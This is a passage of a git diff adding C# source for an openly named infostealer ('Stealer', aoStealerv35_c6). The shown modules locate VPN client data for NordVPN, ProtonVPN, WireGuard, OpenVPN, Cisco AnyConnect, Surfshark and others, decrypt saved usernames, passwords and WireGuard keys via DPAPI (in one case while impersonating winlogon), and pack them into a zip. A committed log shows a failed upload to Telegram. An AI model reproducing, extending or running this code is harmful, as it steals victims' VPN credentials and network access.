new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._IpVanish.cs differ diff --git a/New/Intelix.Targets.Vpn/._MullVad.cs b/New/Intelix.Targets.Vpn/._MullVad.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._MullVad.cs differ diff --git a/New/Intelix.Targets.Vpn/._NordVpn.cs b/New/Intelix.Targets.Vpn/._NordVpn.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._NordVpn.cs differ diff --git a/New/Intelix.Targets.Vpn/._OpenVpn.cs b/New/Intelix.Targets.Vpn/._OpenVpn.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._OpenVpn.cs differ diff --git a/New/Intelix.Targets.Vpn/._PIAVPN.cs b/New/Intelix.Targets.Vpn/._PIAVPN.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._PIAVPN.cs differ diff --git a/New/Intelix.Targets.Vpn/._ProtonVpn.cs b/New/Intelix.Targets.Vpn/._ProtonVpn.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._ProtonVpn.cs differ diff --git a/New/Intelix.Targets.Vpn/._Proxifier.cs b/New/Intelix.Targets.Vpn/._Proxifier.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._Proxifier.cs differ diff --git a/New/Intelix.Targets.Vpn/._RadminVPN.cs b/New/Intelix.Targets.Vpn/._RadminVPN.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._RadminVPN.cs differ diff --git a/New/Intelix.Targets.Vpn/._SoftEther.cs b/New/Intelix.Targets.Vpn/._SoftEther.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._SoftEther.cs differ diff --git a/New/Intelix.Targets.Vpn/._SurfShark.cs b/New/Intelix.Targets.Vpn/._SurfShark.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._SurfShark.cs differ diff --git a/New/Intelix.Targets.Vpn/._WireGuard.cs b/New/Intelix.Targets.Vpn/._WireGuard.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Vpn/._WireGuard.cs differ diff --git a/New/Intelix.Targets.Vpn/Cisco.cs b/New/Intelix.Targets.Vpn/Cisco.cs new file mode 100644 index 0000000..1bc99a8 --- /dev/null +++ b/New/Intelix.Targets.Vpn/Cisco.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class Cisco : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "Cisco", "Cisco AnyConnect Secure Mobility Client", "Profile"); + if (Directory.Exists(text)) + { + string text2 = "Cisco"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Cisco AnyConnect"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/CyberGhost.cs b/New/Intelix.Targets.Vpn/CyberGhost.cs new file mode 100644 index 0000000..b1969e4 --- /dev/null +++ b/New/Intelix.Targets.Vpn/CyberGhost.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class CyberGhost : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "CyberGhost"); + if (Directory.Exists(text)) + { + string text2 = "CyberGhost"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "CyberGhost"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/ExpressVPN.cs b/New/Intelix.Targets.Vpn/ExpressVPN.cs new file mode 100644 index 0000000..6157016 --- /dev/null +++ b/New/Intelix.Targets.Vpn/ExpressVPN.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class ExpressVPN : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "ExpressVPN"); + if (Directory.Exists(text)) + { + string text2 = "ExpressVPN"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "ExpressVPN"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/Hamachi.cs b/New/Intelix.Targets.Vpn/Hamachi.cs new file mode 100644 index 0000000..a8201a4 --- /dev/null +++ b/New/Intelix.Targets.Vpn/Hamachi.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class Hamachi : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "LogMeIn Hamachi"); + if (Directory.Exists(text)) + { + string text2 = "LogMeIn Hamachi"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "LogMeIn Hamachi"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/HideMyName.cs b/New/Intelix.Targets.Vpn/HideMyName.cs new file mode 100644 index 0000000..f699d9c --- /dev/null +++ b/New/Intelix.Targets.Vpn/HideMyName.cs @@ -0,0 +1,52 @@ +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text.RegularExpressions; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class HideMyName : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\Program Files\\hidemy.name VPN 2.0"; + if (!Directory.Exists(text)) + { + return; + } + string text2 = "HideMyName"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "HideMyName"; + if (File.Exists(text + "\\HideMyName")) + { + zip.AddFile(text2 + "\\HideMyName", File.ReadAllBytes(text + "\\HideMyName")); + counterApplications.Files.Add(text + "\\HideMyName => " + text2 + "\\HideMyName"); + } + if (File.Exists(text + "\\log-app.txt")) + { + zip.AddFile(text2 + "\\log-app.txt", File.ReadAllBytes(text + "\\log-app.txt")); + counterApplications.Files.Add(text + "\\log-app.txt => " + text2 + "\\log-app.txt"); + List list = new List(); + foreach (Match item in new Regex("code\\s+(\\d+)").Matches(File.ReadAllText(text + "\\log-app.txt"))) + { + if (item.Success) + { + string value = item.Groups[1].Value; + if (!list.Contains(value)) + { + list.Add(value); + } + } + } + if (list.Count() > 0) + { + zip.AddTextFile(text2 + "\\ActivatedCodes.txt", string.Join("\n", list)); + counterApplications.Files.Add(text + "\\log-app.txt => " + text2 + "\\ActivatedCodes.txt"); + } + } + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Vpn/IpVanish.cs b/New/Intelix.Targets.Vpn/IpVanish.cs new file mode 100644 index 0000000..96a839c --- /dev/null +++ b/New/Intelix.Targets.Vpn/IpVanish.cs @@ -0,0 +1,23 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class IpVanish : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "IPVanish", "Settings"); + if (Directory.Exists(text)) + { + string text2 = "IPVanish"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "IPVanish"; + zip.AddDirectoryFiles(text, text2); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/MullVad.cs b/New/Intelix.Targets.Vpn/MullVad.cs new file mode 100644 index 0000000..90f1027 --- /dev/null +++ b/New/Intelix.Targets.Vpn/MullVad.cs @@ -0,0 +1,22 @@ +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class MullVad : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\Program Files\\Mullvad VPN\\Configs\\Mullvad"; + if (File.Exists(text)) + { + string text2 = "Mullvad"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Mullvad"; + zip.AddFile(Path.Combine(text2, Path.GetFileName(text)), File.ReadAllBytes(text)); + counterApplications.Files.Add(text + " => " + text2); + counterApplications.Files.Add(text2); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/NordVpn.cs b/New/Intelix.Targets.Vpn/NordVpn.cs new file mode 100644 index 0000000..b07a772 --- /dev/null +++ b/New/Intelix.Targets.Vpn/NordVpn.cs @@ -0,0 +1,64 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Text; +using System.Xml; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Vpn; + +public class NordVpn : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + DirectoryInfo directoryInfo = new DirectoryInfo(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "NordVPN")); + if (!directoryInfo.Exists) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "NordVPN"; + try + { + DirectoryInfo[] directories = directoryInfo.GetDirectories("NordVpn.exe*"); + foreach (DirectoryInfo directoryInfo2 in directories) + { + List list = new List(); + DirectoryInfo[] directories2 = directoryInfo2.GetDirectories(); + for (int j = 0; j < directories2.Length; j++) + { + string text = Path.Combine(directories2[j].FullName, "user.config"); + if (File.Exists(text)) + { + XmlDocument xmlDocument = new XmlDocument(); + xmlDocument.Load(text); + string text2 = Decode(xmlDocument.SelectSingleNode("//setting[@name='Username']/value")?.InnerText); + string text3 = Decode(xmlDocument.SelectSingleNode("//setting[@name='Password']/value")?.InnerText); + if (!string.IsNullOrEmpty(text2) && !string.IsNullOrEmpty(text3)) + { + list.Add("Username: " + text2 + "\nPassword: " + text3); + } + } + } + if (list.Count > 0) + { + string entryPath = Path.Combine("NordVPN", directoryInfo2.Name, "accounts.txt"); + counterApplications.Files.Add(directoryInfo2.FullName + " => NordVPN\\"); + counterApplications.Files.Add("NordVPN\\"); + zip.AddTextFile(entryPath, string.Join("\n\n", list)); + } + } + } + catch + { + } + counterApplications.Files.Add("NordVPN\\"); + counter.Vpns.Add(counterApplications); + } + + private static string Decode(string s) + { + return Encoding.UTF8.GetString(DpApi.Decrypt(Convert.FromBase64String(s))) ?? ""; + } +} diff --git a/New/Intelix.Targets.Vpn/OpenVpn.cs b/New/Intelix.Targets.Vpn/OpenVpn.cs new file mode 100644 index 0000000..518e27f --- /dev/null +++ b/New/Intelix.Targets.Vpn/OpenVpn.cs @@ -0,0 +1,37 @@ +using System; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class OpenVpn : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "OpenVPN Connect", "profiles"); + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "OpenVPN"; + Parallel.ForEach(Directory.GetFiles(text), delegate(string file) + { + try + { + if (!(Path.GetExtension(file) != ".ovpn")) + { + string entryPath = "OpenVpn\\" + Path.GetFileName(file); + zip.AddFile(entryPath, File.ReadAllBytes(file)); + } + } + catch + { + } + }); + counterApplications.Files.Add(text + " => OpenVpn"); + counterApplications.Files.Add("OpenVpn\\"); + counter.Vpns.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Vpn/PIAVPN.cs b/New/Intelix.Targets.Vpn/PIAVPN.cs new file mode 100644 index 0000000..ea4a9b9 --- /dev/null +++ b/New/Intelix.Targets.Vpn/PIAVPN.cs @@ -0,0 +1,22 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class PIAVPN : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), "pia_manager"); + if (Directory.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "PIA"; + zip.AddDirectoryFiles(text, "PIAVPN"); + counterApplications.Files.Add(text + " => PIAVPN"); + counterApplications.Files.Add("PIAVPN\\"); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/ProtonVpn.cs b/New/Intelix.Targets.Vpn/ProtonVpn.cs new file mode 100644 index 0000000..9ea9bf1 --- /dev/null +++ b/New/Intelix.Targets.Vpn/ProtonVpn.cs @@ -0,0 +1,50 @@ +using System; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class ProtonVpn : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "ProtonVPN"); + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "ProtonVPN"; + Parallel.ForEach(Directory.GetDirectories(text), delegate(string dir) + { + try + { + if (dir.Contains("ProtonVPN_")) + { + Parallel.ForEach(Directory.GetDirectories(dir), delegate(string version) + { + try + { + string path = Path.Combine(version, "user.config"); + if (File.Exists(path)) + { + string entryPath = "ProtonVpn\\" + Path.GetFileName(version) + "\\user.config"; + zip.AddFile(entryPath, File.ReadAllBytes(path)); + } + } + catch + { + } + }); + } + } + catch + { + } + }); + counterApplications.Files.Add(text + " => ProtonVpn"); + counterApplications.Files.Add("ProtonVpn\\"); + counter.Vpns.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Vpn/Proxifier.cs b/New/Intelix.Targets.Vpn/Proxifier.cs new file mode 100644 index 0000000..3b5bf33 --- /dev/null +++ b/New/Intelix.Targets.Vpn/Proxifier.cs @@ -0,0 +1,22 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class Proxifier : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Proxifier4", "Profiles"); + if (Directory.Exists(text)) + { + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Proxifier"; + zip.AddDirectoryFiles(text, "Proxifier"); + counterApplications.Files.Add(text + " => Proxifier"); + counterApplications.Files.Add("Proxifier\\"); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/RadminVPN.cs b/New/Intelix.Targets.Vpn/RadminVPN.cs new file mode 100644 index 0000000..336854f --- /dev/null +++ b/New/Intelix.Targets.Vpn/RadminVPN.cs @@ -0,0 +1,45 @@ +using System.Collections.Generic; +using System.Linq; +using Intelix.Helper; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Vpn; + +public class RadminVPN : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + List list = new List(); + using (RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN", writable: false)) + { + list.AddRange(RegistryParser.ParseKey(key)); + } + using (RegistryKey key2 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0", writable: false)) + { + list.AddRange(RegistryParser.ParseKey(key2)); + } + using (RegistryKey key3 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0\\Firewall", writable: false)) + { + list.AddRange(RegistryParser.ParseKey(key3)); + } + using (RegistryKey key4 = Registry.LocalMachine.OpenSubKey("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0\\Proxy", writable: false)) + { + list.AddRange(RegistryParser.ParseKey(key4)); + } + if (list.Any()) + { + string text = "RadminVPN\\Registry.txt"; + zip.AddTextFile(text, string.Join("\n", list)); + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "RadminVPN"; + counterApplications.Files.Add("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN => " + text); + counterApplications.Files.Add("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0 => " + text); + counterApplications.Files.Add("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0\\Firewall => " + text); + counterApplications.Files.Add("SOFTWARE\\WOW6432Node\\Famatech\\RadminVPN\\1.0\\Proxy => " + text); + counterApplications.Files.Add(text); + counterApplications.Files.Add("RadminVPN\\"); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/SoftEther.cs b/New/Intelix.Targets.Vpn/SoftEther.cs new file mode 100644 index 0000000..99fb0be --- /dev/null +++ b/New/Intelix.Targets.Vpn/SoftEther.cs @@ -0,0 +1,52 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class SoftEther : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles), "SoftEther VPN Client"); + if (!Directory.Exists(text)) + { + return; + } + string path = "SoftEther"; + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "SoftEther VPN"; + string text2 = Path.Combine(text, "vpn_client.config"); + if (File.Exists(text2)) + { + try + { + string text3 = Path.Combine("Vpn", path, "vpn_client.config"); + zip.AddFile(text3, File.ReadAllBytes(text2)); + counterApplications.Files.Add(text2 + " => " + text3); + } + catch + { + } + } + string[] files = Directory.GetFiles(text, "*.vpn", SearchOption.TopDirectoryOnly); + foreach (string text4 in files) + { + try + { + string fileName = Path.GetFileName(text4); + string text5 = Path.Combine("Vpn", path, fileName); + zip.AddFile(text5, File.ReadAllBytes(text4)); + counterApplications.Files.Add(text4 + " => " + text5); + } + catch + { + } + } + if (counterApplications.Files.Count > 0) + { + counterApplications.Files.Add(Path.Combine("Vpn", path)); + counter.Vpns.Add(counterApplications); + } + } +} diff --git a/New/Intelix.Targets.Vpn/SurfShark.cs b/New/Intelix.Targets.Vpn/SurfShark.cs new file mode 100644 index 0000000..a014fea --- /dev/null +++ b/New/Intelix.Targets.Vpn/SurfShark.cs @@ -0,0 +1,37 @@ +using System; +using System.IO; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Vpn; + +public class SurfShark : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Surfshark"); + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "Surfshark"; + string[] array = new string[4] { "data.dat", "settings.dat", "settings-log.dat", "private_settings.dat" }; + foreach (string path in array) + { + try + { + string path2 = Path.Combine(text, path); + if (File.Exists(path2)) + { + zip.AddFile(Path.Combine("Surfshark", path), File.ReadAllBytes(path2)); + } + } + catch + { + } + } + counterApplications.Files.Add(text + " => Surfshark"); + counterApplications.Files.Add("Surfshark\\"); + counter.Vpns.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets.Vpn/WireGuard.cs b/New/Intelix.Targets.Vpn/WireGuard.cs new file mode 100644 index 0000000..46376f8 --- /dev/null +++ b/New/Intelix.Targets.Vpn/WireGuard.cs @@ -0,0 +1,52 @@ +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; + +namespace Intelix.Targets.Vpn; + +public class WireGuard : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + string text = "C:\\Program Files\\WireGuard\\Data\\Configurations"; + if (!Directory.Exists(text)) + { + return; + } + Counter.CounterApplications counterApplications = new Counter.CounterApplications(); + counterApplications.Name = "WireGuard"; + try + { + using (ImpersonationHelper.ImpersonateWinlogon()) + { + Parallel.ForEach(Directory.GetFiles(text), delegate(string file) + { + try + { + string extension = Path.GetExtension(file); + if (extension == ".dpapi") + { + byte[] content = DpApi.Decrypt(File.ReadAllBytes(file)); + zip.AddFile("WireGuard\\" + Path.GetFileNameWithoutExtension(file), content); + } + else if (extension == ".conf") + { + zip.AddFile("WireGuard\\" + Path.GetFileNameWithoutExtension(file) + ".conf", File.ReadAllBytes(file)); + } + } + catch + { + } + }); + } + } + catch + { + } + counterApplications.Files.Add(text + " => WireGuard"); + counterApplications.Files.Add("WireGuard\\"); + counter.Vpns.Add(counterApplications); + } +} diff --git a/New/Intelix.Targets/._ITarget.cs b/New/Intelix.Targets/._ITarget.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets/._ITarget.cs differ diff --git a/New/Intelix.Targets/ITarget.cs b/New/Intelix.Targets/ITarget.cs new file mode 100644 index 0000000..23490c2 --- /dev/null +++ b/New/Intelix.Targets/ITarget.cs @@ -0,0 +1,8 @@ +using Intelix.Helper.Data; + +namespace Intelix.Targets; + +public interface ITarget +{ + void Collect(InMemoryZip zip, Counter counter); +} diff --git a/New/Properties/._AssemblyInfo.cs b/New/Properties/._AssemblyInfo.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Properties/._AssemblyInfo.cs differ diff --git a/New/Properties/AssemblyInfo.cs b/New/Properties/AssemblyInfo.cs new file mode 100644 index 0000000..0cd620b --- /dev/null +++ b/New/Properties/AssemblyInfo.cs @@ -0,0 +1,17 @@ +using System.Diagnostics; +using System.Reflection; +using System.Runtime.CompilerServices; +using System.Runtime.InteropServices; +using System.Runtime.Versioning; + +[assembly: AssemblyTitle("Stealer")] +[assembly: AssemblyDescription("")] +[assembly: AssemblyConfiguration("")] +[assembly: AssemblyCompany("")] +[assembly: AssemblyProduct("Stealer")] +[assembly: AssemblyCopyright("Copyright © 2024")] +[assembly: AssemblyTrademark("")] +[assembly: Guid("8903f661-28b9-4164-94cf-c6d4c5692094")] +[assembly: AssemblyFileVersion("1.0.0.0")] +[assembly: ComVisible(false)] +[assembly: AssemblyVersion("1.0.0.0")] diff --git a/New/aoStealerv35_c6.csproj b/New/aoStealerv35_c6.csproj new file mode 100644 index 0000000..49c5358 --- /dev/null +++ b/New/aoStealerv35_c6.csproj @@ -0,0 +1,40 @@ + + + Stealerv37 + False + True + net462 + + + 12.0 + True + + + WinExe + x64 + app.manifest + + + + + + + + + + + + + + + + + all + runtime; build; native; contentfiles; analyzers; buildtransitive + + + all + runtime; build; native; contentfiles; analyzers; buildtransitive + + + \ No newline at end of file diff --git a/New/aoStealerv35_c6.sln b/New/aoStealerv35_c6.sln new file mode 100644 index 0000000..c0f762d --- /dev/null +++ b/New/aoStealerv35_c6.sln @@ -0,0 +1,25 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio Version 17 +VisualStudioVersion = 17.14.36429.23 d17.14 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "aoStealerv35_c6", "aoStealerv35_c6.csproj", "{44694AB3-D9A0-A33A-9102-B74E0CDD3D06}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Any CPU = Debug|Any CPU + Release|Any CPU = Release|Any CPU + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {44694AB3-D9A0-A33A-9102-B74E0CDD3D06}.Debug|Any CPU.ActiveCfg = Debug|Any CPU + {44694AB3-D9A0-A33A-9102-B74E0CDD3D06}.Debug|Any CPU.Build.0 = Debug|Any CPU + {44694AB3-D9A0-A33A-9102-B74E0CDD3D06}.Release|Any CPU.ActiveCfg = Release|Any CPU + {44694AB3-D9A0-A33A-9102-B74E0CDD3D06}.Release|Any CPU.Build.0 = Release|Any CPU + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection + GlobalSection(ExtensibilityGlobals) = postSolution + SolutionGuid = {9F2D25AB-A9D4-42DD-902C-4FA72DB90AEA} + EndGlobalSection +EndGlobal diff --git a/New/app.manifest b/New/app.manifest new file mode 100644 index 0000000..cb183e0 --- /dev/null +++ b/New/app.manifest @@ -0,0 +1,82 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + diff --git a/New/bin/._Debug b/New/bin/._Debug new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/._Debug differ diff --git a/New/bin/._Release b/New/bin/._Release new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/._Release differ diff --git a/New/bin/Debug/._net462 b/New/bin/Debug/._net462 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Debug/._net462 differ diff --git a/New/bin/Release/._net462 b/New/bin/Release/._net462 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Release/._net462 differ diff --git a/New/bin/Release/net462/._Stealerv37.exe b/New/bin/Release/net462/._Stealerv37.exe new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Release/net462/._Stealerv37.exe differ diff --git a/New/bin/Release/net462/._Stealerv37.exe.config b/New/bin/Release/net462/._Stealerv37.exe.config new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Release/net462/._Stealerv37.exe.config differ diff --git a/New/bin/Release/net462/._Stealerv37.pdb b/New/bin/Release/net462/._Stealerv37.pdb new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Release/net462/._Stealerv37.pdb differ diff --git a/New/bin/Release/net462/._telegram_error.log b/New/bin/Release/net462/._telegram_error.log new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/bin/Release/net462/._telegram_error.log differ diff --git a/New/bin/Release/net462/Stealerv37.exe b/New/bin/Release/net462/Stealerv37.exe new file mode 100755 index 0000000..5b3d9b2 Binary files /dev/null and b/New/bin/Release/net462/Stealerv37.exe differ diff --git a/New/bin/Release/net462/Stealerv37.exe.config b/New/bin/Release/net462/Stealerv37.exe.config new file mode 100644 index 0000000..ab21881 --- /dev/null +++ b/New/bin/Release/net462/Stealerv37.exe.config @@ -0,0 +1,6 @@ + + + + + + \ No newline at end of file diff --git a/New/bin/Release/net462/Stealerv37.pdb b/New/bin/Release/net462/Stealerv37.pdb new file mode 100644 index 0000000..73d91b0 Binary files /dev/null and b/New/bin/Release/net462/Stealerv37.pdb differ diff --git a/New/bin/Release/net462/telegram_error.log b/New/bin/Release/net462/telegram_error.log new file mode 100644 index 0000000..c4e7c50 --- /dev/null +++ b/New/bin/Release/net462/telegram_error.log @@ -0,0 +1 @@ +24/12/2025 18:05:41: Failed to send document. Status: BadRequest, Body: {"ok":false,"error_code":400,"description":"Bad Request: chat not found"} diff --git a/New/obj/._Debug b/New/obj/._Debug new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._Debug differ diff --git a/New/obj/._Release b/New/obj/._Release new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._Release differ diff --git a/New/obj/._aoStealerv35_c6.csproj.nuget.dgspec.json b/New/obj/._aoStealerv35_c6.csproj.nuget.dgspec.json new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._aoStealerv35_c6.csproj.nuget.dgspec.json differ diff --git a/New/obj/._aoStealerv35_c6.csproj.nuget.g.props b/New/obj/._aoStealerv35_c6.csproj.nuget.g.props new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._aoStealerv35_c6.csproj.nuget.g.props differ diff --git a/New/obj/._aoStealerv35_c6.csproj.nuget.g.targets b/New/obj/._aoStealerv35_c6.csproj.nuget.g.targets new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._aoStealerv35_c6.csproj.nuget.g.targets differ diff --git a/New/obj/._project.assets.json b/New/obj/._project.assets.json new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._project.assets.json differ diff --git a/New/obj/._project.nuget.cache b/New/obj/._project.nuget.cache new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/._project.nuget.cache differ diff --git a/New/obj/Debug/._net462 b/New/obj/Debug/._net462 new file mode 100755 index 0000000..bd96d74 Binary files /dev/null and b/New/obj/Debug/._net462 differ diff --git a/New/obj/Debug/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs b/New/obj/Debug/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs new file mode 100644 index 0000000..393142f --- /dev/null +++ b/New/obj/Debug/net462/.NETFramework,Version=v4.6.2.AssemblyAttributes.cs @@ -0,0 +1,4 @@ +// +using System; +using System.Reflection; +[assembly: 